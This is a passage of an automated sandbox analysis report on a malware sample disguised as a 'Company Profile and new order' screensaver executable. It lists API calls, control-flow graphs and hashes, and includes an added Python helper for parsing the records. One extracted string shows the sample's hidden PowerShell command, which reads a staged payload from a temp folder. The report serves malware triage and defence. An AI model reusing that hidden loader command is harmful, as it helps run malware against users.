                                                                                             • Edges: 717->718, 717->719, 718->719, 719->720, 719->721, 720->723, 721->720, 721->722, 722->723
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                            • wsprintfW.USER32 ref: 004068F7
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                            • API String ID: 2200240437-1106614640
                                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8

                                                                                             Control-flow Graph (rendered as an image in the report; recovered here as basic blocks with the calls they contain, then the edge list; the executed/not-executed colouring of the image is not recoverable from the text)
                                                                                             • 724 406040-40604c
                                                                                             • 725 40604d-406081: GetTickCount, GetTempFileNameW
                                                                                             • 726 406090-406092
                                                                                             • 727 406083-406085
                                                                                             • 728 406087
                                                                                             • 729 40608a-40608d
                                                                                             • Edges: 724->725, 725->726, 725->727, 726->729, 727->725, 727->728, 728->729
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0040605E
                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-44229769
                                                                                            • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                                                            • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768

                                                                                             Control-flow Graph (rendered as an image in the report; recovered here as basic blocks with the calls they contain, then the edge list; the executed/not-executed colouring of the image is not recoverable from the text)
                                                                                             • 817 4015c6-4015da: call 402dab, call 405e9b
                                                                                             • 822 401636-401639
                                                                                             • 823 4015dc-4015ef: call 405e1d
                                                                                             • 825 401668-4022fb: call 401423
                                                                                             • 826 40163b-40165a: call 401423, call 406521, SetCurrentDirectoryW
                                                                                             • 832 4015f1-4015f4
                                                                                             • 833 401609-40160c: call 405acf
                                                                                             • 834 4015f6-4015fd: call 405aec
                                                                                             • 840 402c2f-402c3e
                                                                                             • 841 401611-401613
                                                                                             • 843 401660-401663
                                                                                             • 845 401615-40161a
                                                                                             • 846 40162c-401634
                                                                                             • 847 4015ff-401602: call 405a75
                                                                                             • 849 401629
                                                                                             • 850 40161c-401627: GetFileAttributesW
                                                                                             • 852 401607
                                                                                             • Edges: 817->822, 817->823, 822->825, 822->826, 823->832, 823->833, 825->840, 826->840, 826->843, 832->833, 832->834, 833->841, 834->833, 834->847, 841->845, 841->846, 843->840, 845->849, 845->850, 846->822, 846->823, 847->852, 849->846, 850->846, 850->849, 852->841
                                                                                            APIs
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405EA9
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                              • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,?,00000000,000000F0), ref: 00401652
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nonopposable\ff4, xrefs: 00401645
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nonopposable\ff4
                                                                                            • API String ID: 1892508949-404807915
                                                                                            • Opcode ID: f55218e8b6f1fa2fa585d0983886a48e43472ac89c3349b89f97aee5203578da
                                                                                            • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                            • Opcode Fuzzy Hash: f55218e8b6f1fa2fa585d0983886a48e43472ac89c3349b89f97aee5203578da
                                                                                            • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
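The three function records above describe, through their API lists and graph text, three pieces of the stub's behaviour: the function at 4068a5 builds the path `<system directory>\UXTHEME.dll` with `wsprintfW("%s%S.dll", ...)` and loads it through `LoadLibraryExW` with dwFlags 00000008, which is LOAD_WITH_ALTERED_SEARCH_PATH, so the DLL is resolved from the absolute system-directory path rather than from the stub's own working or temp directory (the DLL search-order hijacking defence one expects from an installer stub); the function at 406040 loops on `GetTickCount`/`GetTempFileNameW` with the `nsa` prefix under `C:\Users\user\AppData\Local\Temp\` until a temp file is created; and the function at 4015c6 walks a path component by component (`CharNextW`, `GetFileAttributesW`, `CreateDirectoryW` in its subcalls) before `SetCurrentDirectoryW` into `C:\Users\user\AppData\Local\Temp\nonopposable\ff4`. Reading such records by hand across a long report is slow, so the following Python helper, an editor-added example rather than Joe Sandbox tooling or code from the sample, parses the report's `control_flow_graph` text and `APIs` lines into structures that answer the questions a triager asks: which imported APIs the function calls in address order, which internal functions it calls, which blocks sit inside a loop, and what a numeric argument such as the LoadLibraryExW flag means. The graph string embedded below is copied from the 4068a5 record; the flag names are the winbase.h LoadLibraryEx constants; the token grammar of the graph text (decimal node id, address or address range, optional `call <addr>` and API-name tokens, `a->b` edges) is inferred from this report and is an assumption.

```python
"""Parse a Joe Sandbox function record's control_flow_graph text and APIs lines (editor-added example)."""
import re
from dataclasses import dataclass, field

# LoadLibraryEx dwFlags bits (winbase.h), to decode e.g. LoadLibraryExW(?,00000000,00000008).
LOADLIBRARYEX_FLAGS = {
    0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
    0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x80: "LOAD_LIBRARY_REQUIRE_SIGNED_TARGET", 0x100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR", 0x400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32", 0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}

@dataclass
class Block:
    ident: int   # node id used in the graph text
    start: int   # first instruction address
    end: int     # last instruction address (== start for single-address nodes)
    apis: list = field(default_factory=list)   # imported APIs called in this block
    calls: list = field(default_factory=list)  # internal "call <addr>" targets

@dataclass
class Cfg:
    blocks: dict  # id -> Block, in declaration order (entry block first)
    edges: list   # (src_id, dst_id)

    def api_sequence(self):
        """Imported APIs in address order: the straight-line reading of the function."""
        return [a for b in sorted(self.blocks.values(), key=lambda b: b.start) for a in b.apis]

    def call_targets(self):
        return sorted({t for b in self.blocks.values() for t in b.calls})

    def _reach(self, src):
        seen, todo = set(), [src]
        while todo:
            n = todo.pop()
            if n not in seen:
                seen.add(n)
                todo.extend(d for s, d in self.edges if s == n)
        return seen

    def loop_blocks(self):
        """Ids of blocks that lie on a cycle, i.e. inside a retry or per-item loop."""
        return sorted(b for b in self.blocks
                      if any(b in self._reach(d) for s, d in self.edges if s == b))

def parse_cfg(text):
    """Grammar assumed from this report: a decimal token opens a node and is followed by its
    address (range); 'a->b' is an edge; 'call <hex>' is an internal call; anything else is an API."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        if "->" in t:
            a, b = t.split("->")
            edges.append((int(a), int(b)))
            i += 1
        elif t.isdigit():
            lo, _, hi = toks[i + 1].partition("-")
            cur = blocks[int(t)] = Block(int(t), int(lo, 16), int(hi or lo, 16))
            i += 2
        elif t == "call":
            cur.calls.append(int(toks[i + 1], 16))
            i += 2
        else:
            cur.apis.append(t)
            i += 1
    return Cfg(blocks, edges)

API_LINE = re.compile(
    r"^\W*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)")

def parse_api_line(line):
    """Parse one '• Api.MODULE(args), ref: ADDR' listing line; None if it is not one."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args.split(",") if args else [], "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None}

def decode_loadlibraryex_flags(args):
    """dwFlags is LoadLibraryExW's third argument; '?' means the sandbox did not recover it."""
    if len(args) < 3 or not re.fullmatch(r"[0-9A-Fa-f]+", args[2]):
        return None
    val = int(args[2], 16)
    return [n for bit, n in sorted(LOADLIBRARYEX_FLAGS.items()) if val & bit]

# Graph text copied from the 4068a5 (UXTHEME loader) record above; constructed sample input.
CFG_UXTHEME = ("control_flow_graph 717 4068a5-4068c5 GetSystemDirectoryW 718 4068c7 717->718 "
               "719 4068c9-4068cb 717->719 718->719 720 4068dc-4068de 719->720 721 4068cd-4068d6 "
               "719->721 723 4068df-406912 wsprintfW LoadLibraryExW 720->723 721->720 "
               "722 4068d8-4068da 721->722 722->723")
```

Feed it the other two graph strings from this report and the picture matches the prose reading above: the UXTHEME loader is straight-line code with no loop blocks, the temp-file helper reports blocks 725 and 727 as its retry loop around `GetTempFileNameW`, and the directory-creation function reports the eleven blocks from 823 to 852 (the per-component walk ending in `GetFileAttributesW`) as one loop, with `GetFileAttributesW` followed by `SetCurrentDirectoryW` in address order and eight distinct internal call targets. Decoding the `LoadLibraryExW` line yields `LOAD_WITH_ALTERED_SEARCH_PATH`; when the sandbox prints `?` for an argument the decoder returns None instead of guessing.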
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                            • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                                                            • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                            • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                            • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                                                            • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                            • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                            • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                                                            • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                            • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                            • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                            • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                            • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                            • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                            • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                            • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                            • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                            • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                            • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                            • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                            • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                            • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                            APIs
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                                            Strings
                                                                                            • powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp, xrefs: 00401BC7, 00401BCD, 00401BE7
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree
                                                                                            • String ID: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp
                                                                                            • API String ID: 3394109436-3685013750
                                                                                            • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                                            • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                                                                                            • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                                            • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                                                                                            APIs
                                                                                              • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                              • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                            • lstrlenW.KERNEL32 ref: 00402344
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                                                            Similarity
                                                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                            • String ID:
                                                                                            • API String ID: 1486964399-0
                                                                                            • Opcode ID: adf239f7f9eb47ee802845b618c645dbf4ee4f3d223853d8a4e14c953ff1d079
                                                                                            • Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
                                                                                            • Opcode Fuzzy Hash: adf239f7f9eb47ee802845b618c645dbf4ee4f3d223853d8a4e14c953ff1d079
                                                                                            • Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                            • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                            • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                            • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 00405689
                                                                                              • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004056D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2896919175-0
                                                                                            • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                            • Instruction ID: 475fcf9b7f10ddbfaf371a97523a1b3de976bd413908d41e9885f35b47f6a1cd
                                                                                            • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                            • Instruction Fuzzy Hash: 34F09A776007409BEA215795AE06B6777B4EB94304F85483AEF8CA26F1CB7A4C028B5D
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                            • GetLastError.KERNEL32 ref: 00405AC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                                                            • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?, ",?), ref: 00405B2D
                                                                                            • CloseHandle.KERNEL32(?,?,?, ",?), ref: 00405B3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3712363035-0
                                                                                            • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                            • Instruction ID: ee07c3f2d7011aacc779afc4df031ab31c5939bdda65a61cc684f2ad200dc2b8
                                                                                            • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                            • Instruction Fuzzy Hash: 7FE0BFB4610219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551E774A9148A78
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
